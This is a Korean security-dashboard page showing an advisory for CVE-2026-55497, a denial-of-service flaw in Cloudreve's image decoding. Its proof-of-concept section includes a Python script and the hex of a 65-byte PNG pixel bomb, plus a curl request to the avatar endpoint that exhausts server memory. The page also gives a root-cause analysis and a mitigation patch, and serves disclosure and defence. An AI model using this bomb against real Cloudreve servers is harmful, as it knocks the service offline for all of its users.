Kestrel
대시보드로 돌아가기
CVE-2026-55497MEDIUM· 6.5GHSA대응게시일: 2026. 07. 24.수정일: 2026. 07. 24.

Cloudreve: Denial of Service - Image decompression / pixel bomb in thumbnail & avatar decoding crashes the server

위협 신호 · CVSS · EPSS · KEV

정기 패치· 높은 악용 신호 없음
CVSS
6.5medium

이론적 심각도 점수

EPSS

예측 데이터 없음

KEV
미등재

실측 악용 기록 없음

권장 대응 기한60일 이내CISA SSVC 기준

계획된 패치 주기 내 조치(60일 이내)

외부 노출· KEV 미등재 · 자동화 어려움 · 부분 영향 · 외부 노출

CVSS 벡터 · 메트릭

악용 경로
공격 벡터네트워크
공격 복잡도낮음
필요 권한낮음
사용자 상호작용불필요
범위불변
영향
기밀성 영향없음
무결성 영향없음
가용성 영향높음
버전별 점수
CVSS 3.16.5MODERATE
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

상세 설명

Summary

Cloudreve's built-in image processor decodes user-supplied images with Go's standard-library decoders (image/png, image/jpeg, image/gif) and guards only the compressed file size — never the decoded pixel dimensions. Go's decoders allocate a pixel buffer sized bytesPerPixel × width × height taken straight from the image header (e.g. a PNG's IHDR), with no upper bound on width/height. A tiny (tens-of-bytes) image that declares enormous dimensions therefore forces a multi-gigabyte-to-terabyte allocation (make([]uint8, …)), exhausting memory. The resulting out-of-memory condition is a fatal Go runtime error / kernel OOM-kill that recover() cannot catch, terminating the whole Cloudreve process for all users.

Two reachable sinks share the same root cause:

  1. Avatar upload (PUT /api/v4/user/setting/avatar) — decodes synchronously in the request handler. Any authenticated user. Cleanest single-request PoC.
  2. Thumbnail generation (built-in generator, enabled by default) — decodes in the thumbnail queue worker. Reachable for the user's own files and for files inside a share, so a planted bomb can be (re)triggered through a public share link.

Post-auth, low privilege. A single 65-byte upload deterministically takes the instance offline.

Details

Root cause — decode guarded by file size, not pixel count

The built-in generator is the default image thumbnailer:

text
1// inventory/setting.go @ 26b6b10
2"thumb_builtin_enabled": "1", // ON by default
3"thumb_builtin_max_size": "78643200", // 75 MB — a *file size* cap
4"thumb_vips_enabled": "0", // libvips (which has its own limits) OFF by default
5...
6"avatar_size": "4194304", // 4 MB — a *file size* cap

Builtin.Generate checks the on-disk/entity size, then hands the raw bytes to the stdlib decoders:

text
1// pkg/thumb/builtin.go:144-152 @ 26b6b10
2func (b Builtin) Generate(ctx context.Context, es entitysource.EntitySource, ext string, previous *Result) (*Result, error) {
3 if es.Entity().Size() > b.settings.BuiltinThumbMaxSize(ctx) { // 75 MB compressed-size check ONLY
4 return nil, fmt.Errorf("file is too big: %w", ErrPassThrough)
5 }
6 img, err := NewThumbFromFile(es, ext) // <-- decode; allocation happens here
7 ...
8}
9
10// pkg/thumb/builtin.go:34-60 @ 26b6b10
11func NewThumbFromFile(file io.Reader, ext string) (*Thumb, error) {
12 switch ext {
13 case "jpg", "jpeg": img, err = jpeg.Decode(file)
14 case "gif": img, err = gif.Decode(file)
15 case "png": img, err = png.Decode(file) // <-- unbounded allocation
16 ...
17 }
18}

There is no image.DecodeConfig pre-check and no dimension/pixel cap anywhere on the path. The only Bounds()/MaxWidth references in the package (builtin.go:70,92,125, avatar_size_l=200) act on the already-decoded image and are the output resize target — they execute long after the oversized input buffer has been allocated.

Why the allocation is unbounded (Go stdlib image/png)

Go's PNG reader takes the dimensions verbatim from IHDR and rejects only non-positive values — there is no maximum:

text
1// Go src/image/png/reader.go — parseIHDR
2w := int32(binary.BigEndian.Uint32(d.tmp[0:4]))
3h := int32(binary.BigEndian.Uint32(d.tmp[4:8]))
4if w <= 0 || h <= 0 { return FormatError("non-positive dimension") } // only guard
5d.width, d.height = int(w), int(h)

On the first IDAT, readImagePass allocates the destination image before consuming the compressed pixel data, e.g. for colour-type 6 (RGBA, 8-bit):

text
1// Go src/image/png/reader.go — readImagePass
2nrgba = image.NewNRGBA(image.Rect(0, 0, width, height)) // make([]uint8, 4*width*height)

image.NewNRGBApixelBufferLengthmul3NonNeg(4, w, h) only guards against integer overflow (returns −1, which panics), not against huge-but-valid sizes. So any 4·w·h that fits in an int and is below the runtime's maxAlloc (~2⁴⁸ on amd64) proceeds to make([]uint8, 4·w·h). The allocation occurs even if the IDAT stream is empty/truncated, so the malicious file needs no real pixel data.

jpeg.Decode (allocates the YCbCr/RGBA buffer from the SOF/SOS dimensions, max 65535×65535 → up to ~17 GB) and gif.Decode (allocates from the logical-screen / frame dimensions) are affected the same way.

Why this is a fatal crash, not a handled error

For realistic bomb sizes (GBs–hundreds of GBs, all < maxAlloc), make proceeds and the process dies by one of:

  • Kernel OOM-killer sends SIGKILL when the touched pages can't be backed — not catchable by anything; or
  • the Go runtime throw("out of memory") — a fatal error, not a recoverable panic, so gin.Recovery() does not save it.

(Only the integer-overflow branch yields a recoverable panic; a competent attacker stays in the fatal-OOM regime, as the PoC does.)

Reachability of each sink

Avatar (synchronous, in the HTTP handler):

text
1// routers/router.go:1269 @ 26b6b10 (under auth.Use(LoginRequired()) → user group)
2setting.PUT("avatar", middleware.RequiredScopes(types.ScopeUserInfoWrite), controllers.UploadAvatar)
3
4// service/user/setting.go:158-217 @ 26b6b10
5func UpdateUserAvatar(c *gin.Context) error {
6 ...
7 if c.Request.ContentLength == -1 || c.Request.ContentLength > avatarSettings.MaxFileSize { // 4 MB cap
8 return ...CodeFileTooLarge
9 }
10 return updateAvatarFile(c, u, c.GetHeader("Content-Type"), c.Request.Body, avatarSettings)
11}
12func updateAvatarFile(...) error {
13 ext := "png"
14 switch contentType { case "image/jpeg","image/jpg": ext="jpg"; case "image/gif": ext="gif" }
15 avatar, err := thumb.NewThumbFromFile(file, ext) // <-- decode of attacker bytes; no dim check
16 ...
17}

A 65-byte PoC trivially satisfies the 4 MB ContentLength cap.

Thumbnail (queue worker, in-process): manager.ThumbnailSubmitAndAwaitThumbnailTaskgenerateThumbpipeline.Generate (pkg/filemanager/manager/thumbnail.go:128-145, pkg/thumb/pipeline.go:86). The pipeline tries the enabled-by-default built-in generator for png/jpg/gif (other generators return ErrPassThrough for those extensions). Triggered via GET /api/v4/file/thumb?uri=… for the user's own files, and the same generation runs for files reached through a share (NavigatorCapabilityGenerateThumb), so a bomb dropped into a public share can be (re)triggered by an anonymous visitor.

Proof of Concept

The bomb (65 bytes — included as pixelbomb.png)

Generated with:

python
1import struct, zlib, binascii
2def chunk(t,d):
3 c=t+d; return struct.pack(">I",len(d))+c+struct.pack(">I",binascii.crc32(c)&0xffffffff)
4sig=b'\x89PNG\r\n\x1a\n'
5W,H=0x7FFFFFFF,0x10 # 2147483647 x 16
6ihdr=struct.pack(">IIBBBBB",W,H,8,6,0,0,0) # 8-bit, colour-type 6 (RGBA)
7png=sig+chunk(b'IHDR',ihdr)+chunk(b'IDAT',zlib.compress(b''))+chunk(b'IEND',b'')
8open('pixelbomb.png','wb').write(png)
9# Go will attempt make([]uint8, 4*W*H) = 137,438,953,408 bytes (128 GiB)

Hex (entire file):

text
18950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
27fff ffff 0000 0010 0806 0000 0068 bce2 .............h..
3e300 0000 0849 4441 5478 9c03 0000 0000 .....IDATx......
40148 0689 d200 0000 0049 454e 44ae 4260 .H.......IEND.B`
582

(Dimensions are tunable: 4·W·H must stay < 2⁶³ to avoid the overflow→panic branch and < maxAlloc. 2147483647 × 16 → 128 GiB reliably OOM-kills any host; shrink H for smaller targets.)

Trigger (avatar — single request)

bash
1base=https://host/api/v4
2curl -s -X PUT "$base/user/setting/avatar" \
3 -H "Authorization: Bearer $TOK" \
4 -H 'Content-Type: image/png' \
5 --data-binary @pixelbomb.png

Observable result

bash
1# Either the kernel OOM-killer terminates the process:
2# dmesg: "Out of memory: Killed process <pid> (cloudreve)"
3# or the Go runtime aborts fatally:
4# fatal error: runtime: out of memory
5# The Cloudreve process exits; all users get connection-refused until restart.

Impact

  • Direct primitive: full availability loss — the process aborts, dropping all in-flight requests/sessions for every tenant on the instance.
  • Persistence / repeatability: the bomb can be stored (as a file whose thumbnail is generated on demand, or re-uploaded as an avatar), so the instance can be crashed again immediately after each restart; if supervised with auto-restart, the attacker scripts a sustained outage.
  • Amplification: each request costs the attacker ~65 bytes but costs the server an attempted multi-GB/TB allocation; trivial to repeat/parallelize.
  • No special privilege: any registered user (avatar). The thumbnail sink lets a planted bomb in a public share be re-triggered anonymously.

Suggested Mitigation

Cap decoded pixel dimensions before fully decoding, in addition to the existing file-size cap. Use image.DecodeConfig (reads only the header) and reject images whose width × height (or either dimension) exceeds a configurable limit; apply it in NewThumbFromFile so both the thumbnail and avatar paths are covered.

text
1--- a/pkg/thumb/builtin.go
2+++ b/pkg/thumb/builtin.go
3@@ func NewThumbFromFile(file io.Reader, ext string) (*Thumb, error) {
4- var err error
5- var img image.Image
6- switch ext {
7+ const maxPixels = 50 * 1000 * 1000 // e.g. 50 MP; make configurable
8+ // Peek header-only to reject pixel/decompression bombs before allocation.
9+ var hdrBuf bytes.Buffer
10+ cfg, _, err := image.DecodeConfig(io.TeeReader(file, &hdrBuf))
11+ if err != nil {
12+ return nil, fmt.Errorf("failed to read image config: %w (%w)", err, ErrPassThrough)
13+ }
14+ if int64(cfg.Width)*int64(cfg.Height) > maxPixels {
15+ return nil, fmt.Errorf("image dimensions too large (%dx%d): %w", cfg.Width, cfg.Height, ErrPassThrough)
16+ }
17+ file = io.MultiReader(&hdrBuf, file) // replay consumed header bytes
18+ var img image.Image
19+ switch ext {
20 case "jpg", "jpeg": img, err = jpeg.Decode(file)
21 case "gif": img, err = gif.Decode(file)
22 case "png": img, err = png.Decode(file)

Additionally:

  • Apply the same pixel cap to the avatar path (covered automatically if it routes through NewThumbFromFile, as it does).
  • Consider running image decoding in a memory-limited child process / with debug.SetMemoryLimit + a GOMEMLIMIT-aware soft fail so a single decode cannot take down the whole server even if a future decoder lacks a header pre-check.

Why sufficient: DecodeConfig parses only the header (no large allocation), so the oversized buffer is never created; legitimate images decode unchanged.

AI 심층 분석

공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.